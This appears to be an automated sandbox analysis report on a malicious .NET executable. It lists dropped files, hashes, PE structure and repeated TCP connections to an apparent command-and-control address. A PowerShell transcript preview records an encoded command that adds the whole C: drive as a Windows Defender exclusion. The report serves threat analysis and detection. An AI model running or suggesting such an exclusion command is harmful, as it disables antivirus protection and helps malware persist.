Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.993014478972177
Encrypted:	false
SSDEEP:	384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
MD5:	C5A56B913DEEDCF5AE01A2D4F8AA69CE
SHA1:	C91D19BFD666FDD02B0739893833D4E1C0316511
SHA-256:	1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
SHA-512:	1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
Malicious:	false
Preview:	PSMODULECACHE......#y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22176
Entropy (8bit):	5.601138309758725
Encrypted:	false
SSDEEP:	384:5tCABCmzRYPvYAnISBKnLul/sp6vz1Nnqa9ZFtPV7I1WDuZ1v1I5+yYs:VgvBI4KLulcI7qOXNUvr+
MD5:	EA4826E83AF1B21101CE6F68EF0B55C6
SHA1:	0046E23F0CC87039F220713239AD6B86DE91ABF0
SHA-256:	279B8D0ADA726FE5DFB5E6A238E2FFD2FE1A16F971BCFB6B41E4034E0CB9AA88
SHA-512:	39BCC0A6DEA0B45B877F6DCEE5930E34C49B5034F56D0E08168CC525631DE76772ADA7DE79B28263240D4422AB47AF91E9A8917548E10224194D7B924D4C53EB
Malicious:	false
Preview:	@...e...........`...........>.3.0....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pshfc5wv.vht.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Download File

Process:	C:\Users\user\Desktop\kyFBQxVbsg.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	735232
Entropy (8bit):	7.987468698438195
Encrypted:	false
SSDEEP:	12288:9IxCLALqCddwA7Pljw5ej79G72AUBV3xaTPqfH0pLbwfBnC7aCNsuAIi6:9IxAgWA79Mq7s7ZUFV/IwfKagsWi6
MD5:	972334F0C55D0AEAB0B32EFE41EA3470
SHA1:	E9097B5CD1F976ECAF0ACCEDF14F1D22BD72E6FA
SHA-256:	EB91BF1E2EB3877F0942CEF113BB0FB76E2C2FD2C2651DBF09F6DA6DF649E8FB
SHA-512:	DF120F43FA17B2C37AD6D31E528495241146420CD017C18116BD074498CEF3834F408C50D289F8BDCE2955C464664A6C446800CB7B55C1461FB3CC0ACCC7FE10
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..b..............0......F........... ........@.. ....................................`.....................................O.... ...D........................................................................... ............... ..H............text........ ...................... ..`.rsrc....D... ...D..................@..@.reloc...............6..............@..B........................H.......................$$..............................................".(.....".(........0..g.........s......s........s....s........+..+.o....+.....+..o....+.,.+....o........+..o....+.,.+....,..o.........(......./..........:I..........RZ.......0.."........ .........%.....(......(.....+.....0..L........s........o......s........o......o......!.,..o.......,..o.......,..o.......*.(.......)..........$4..........8?.......0..`.........(....(....o....(...+o.....+"..(.......o...

C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\kyFBQxVbsg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\forbas\scxs.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	234
Entropy (8bit):	7.177722839093587
Encrypted:	false
SSDEEP:	6:6p288ILJoF861v83dMuVm6IRRqG6Q6P9SR2p6:6F8ILJoF8cv83uBRp6Qe9a2p6
MD5:	0BC4CF36ABF59CC54AA5D472D55FAE99
SHA1:	FE3A6EB4A46CA56C855CA308EC96838C96C63AA2
SHA-256:	9E6854C21A182D3224B40053CEE8BCF8C6E055C08D7ECE2ED6CDD6F7090C048E
SHA-512:	07028E2E89213CCB36A06968692D22F37452E22920C12B00C2B9503F22906388D1B1B07AAE92C43D675DD82C9BD2B019E53A298B23CEBEE26800B02855595FC6
Malicious:	false
Preview:	.j.V.J..!kU_..sY.[.t.....\|]..%...*!.A].y..x......L.B......C.......=&f&..Vn.}...$.P....{j.gl.......Ni:.o.s./.=...fL...c..<.A..V1...4X>.".\|.`....C..m7[u....$F')5..d..p;....2....MB.$..-..{o\|{!uc..B.}...m....X8.0......7.@.....

C:\Users\user\Documents\20220626\PowerShell_transcript.128757.EFYe5VSb.20220626094450.txt

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5978
Entropy (8bit):	5.485342256824624
Encrypted:	false
SSDEEP:	96:BZ2TLZ+N3azqDo1ZVZVTLZ+N3azqDo1ZXvZprZkTLZ+N3azqDo1Z2wTTyZh:3acaJaq
MD5:	34326C020EA634E84A3536E82DAFA6F8
SHA1:	A2C2D2F602436AC220AE61B1F43ECBE10DFE8292
SHA-256:	4DB38969B245E4F1E94BFE1254F2A77D386F07717A5D61F7B964F4F3D091C8B0
SHA-512:	476601D408665AFBD80DFDE04925C9035E1FF99EAEBE0BBFD33AC61E67FA53977F87E0BEF0C3F7FA210B724D6FB12162690E3C89D2C83A04DCF4DC71B16CBA21
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220626094508..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==..Process ID: 6288..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220626094509..******************..PS>Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'..********************..Windows PowerShell transcript start..Start

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.987468698438195
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	kyFBQxVbsg.exe
File size:	735232
MD5:	972334f0c55d0aeab0b32efe41ea3470
SHA1:	e9097b5cd1f976ecaf0accedf14f1d22bd72e6fa
SHA256:	eb91bf1e2eb3877f0942cef113bb0fb76e2c2fd2c2651dbf09f6da6df649e8fb
SHA512:	df120f43fa17b2c37ad6d31e528495241146420cd017c18116bd074498cef3834f408c50d289f8bdce2955c464664a6c446800cb7b55c1461fb3cc0accc7fe10
SSDEEP:	12288:9IxCLALqCddwA7Pljw5ej79G72AUBV3xaTPqfH0pLbwfBnC7aCNsuAIi6:9IxAgWA79Mq7s7ZUFV/IwfKagsWi6
TLSH:	67F423A18A0BDF5FE18F5ABB680452F7145CFE231240A318BA4173FE2EB354165E77A4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..b..............0......F........... ........@.. ....................................`................................

File Icon


Icon Hash:	e4d8d8d8dc483196

Static PE Info

General

Entrypoint:	0x4b0ede
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62B71A23 [Sat Jun 25 14:22:27 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb0e8c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x4400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xaeee4	0xaf000	False	0.9951590401785714	data	7.9984009418791	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x4400	0x4400	False	0.5211971507352942	data	5.8634338520962395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xb2160	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0xb26d8	0x1e0b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xb44f4	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON	0xb4dac	0xea8	data
RT_GROUP_ICON	0xb5c64	0x3e	data
RT_VERSION	0xb5cb4	0x362	data
RT_MANIFEST	0xb6028	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 26, 2022 09:45:59.625091076 CEST	49798	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:45:59.667900085 CEST	6968	49798	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:00.312700987 CEST	49798	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:00.355405092 CEST	6968	49798	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:00.919429064 CEST	49798	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:00.964056969 CEST	6968	49798	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:03.523972988 CEST	49801	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:03.566504955 CEST	6968	49801	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:04.126405954 CEST	49801	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:04.168970108 CEST	6968	49801	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:04.811012983 CEST	49801	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:04.854006052 CEST	6968	49801	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:07.212428093 CEST	49803	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:07.255331993 CEST	6968	49803	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:07.837601900 CEST	49803	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:07.880376101 CEST	6968	49803	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:08.428515911 CEST	49803	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:08.471122980 CEST	6968	49803	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:10.571124077 CEST	49805	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:10.613929987 CEST	6968	49805	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:11.219929934 CEST	49805	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:11.262623072 CEST	6968	49805	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:11.811450958 CEST	49805	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:11.856297016 CEST	6968	49805	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:14.949017048 CEST	49809	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:14.993516922 CEST	6968	49809	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:15.610732079 CEST	49809	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:15.653306007 CEST	6968	49809	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:16.219952106 CEST	49809	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:16.262541056 CEST	6968	49809	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:18.189363003 CEST	49814	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:18.235021114 CEST	6968	49814	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:18.923306942 CEST	49814	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:18.967184067 CEST	6968	49814	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:19.610862970 CEST	49814	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:19.653702974 CEST	6968	49814	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:21.858103037 CEST	49830	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:21.900697947 CEST	6968	49830	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:22.532982111 CEST	49830	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:22.575666904 CEST	6968	49830	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:23.126782894 CEST	49830	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:23.169462919 CEST	6968	49830	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:24.980937004 CEST	49846	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:25.027003050 CEST	6968	49846	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:25.567730904 CEST	49846	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:25.610308886 CEST	6968	49846	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:26.127068043 CEST	49846	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:26.172544956 CEST	6968	49846	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:27.845377922 CEST	49859	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:27.888818979 CEST	6968	49859	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:28.424082041 CEST	49859	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:28.468168974 CEST	6968	49859	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:29.111676931 CEST	49859	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:29.154382944 CEST	6968	49859	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:31.270693064 CEST	49864	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:31.317832947 CEST	6968	49864	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:31.924412966 CEST	49864	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:31.967787981 CEST	6968	49864	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:32.612035990 CEST	49864	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:32.657620907 CEST	6968	49864	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:34.441975117 CEST	49866	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:34.488702059 CEST	6968	49866	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:35.127840042 CEST	49866	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:35.170638084 CEST	6968	49866	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:35.737322092 CEST	49866	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:35.783057928 CEST	6968	49866	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:37.239804983 CEST	49867	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:37.285552025 CEST	6968	49867	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:37.799927950 CEST	49867	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:37.842793941 CEST	6968	49867	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:38.346894026 CEST	49867	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:38.391542912 CEST	6968	49867	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:40.412826061 CEST	49868	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:40.455522060 CEST	6968	49868	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:40.956468105 CEST	49868	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:41.001518011 CEST	6968	49868	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:41.503704071 CEST	49868	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:41.548046112 CEST	6968	49868	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:43.088099957 CEST	49870	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:43.130824089 CEST	6968	49870	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:43.644164085 CEST	49870	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:43.690030098 CEST	6968	49870	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:44.191082954 CEST	49870	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:44.235831976 CEST	6968	49870	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:45.616626024 CEST	49871	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:45.663141966 CEST	6968	49871	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:46.175681114 CEST	49871	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:46.222079992 CEST	6968	49871	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:46.722542048 CEST	49871	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:46.767266035 CEST	6968	49871	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:48.412889957 CEST	49873	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:48.456914902 CEST	6968	49873	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:49.097759962 CEST	49873	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:49.142527103 CEST	6968	49873	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:49.691560984 CEST	49873	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:49.735557079 CEST	6968	49873	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:51.152981997 CEST	49874	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:51.197582960 CEST	6968	49874	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:51.895008087 CEST	49874	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:51.940021992 CEST	6968	49874	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:52.442003965 CEST	49874	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:52.487611055 CEST	6968	49874	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:53.821578026 CEST	49885	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:53.865124941 CEST	6968	49885	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:54.379611015 CEST	49885	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:54.422627926 CEST	6968	49885	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:54.926536083 CEST	49885	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:54.969086885 CEST	6968	49885	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:56.364463091 CEST	49897	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:56.407010078 CEST	6968	49897	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:56.911025047 CEST	49897	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:56.953612089 CEST	6968	49897	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:57.457989931 CEST	49897	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:57.503067970 CEST	6968	49897	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:58.873553038 CEST	49899	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:58.918741941 CEST	6968	49899	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:59.426927090 CEST	49899	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:46:59.471564054 CEST	6968	49899	194.5.98.107	192.168.2.6
Jun 26, 2022 09:46:59.973848104 CEST	49899	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:00.016602993 CEST	6968	49899	194.5.98.107	192.168.2.6
Jun 26, 2022 09:47:01.341916084 CEST	49900	6968	192.168.2.6	194.5.98.107
Jun 26, 2022 09:47:01.386122942 CEST	6968	49900	194.5.98.107	192.168.2.6
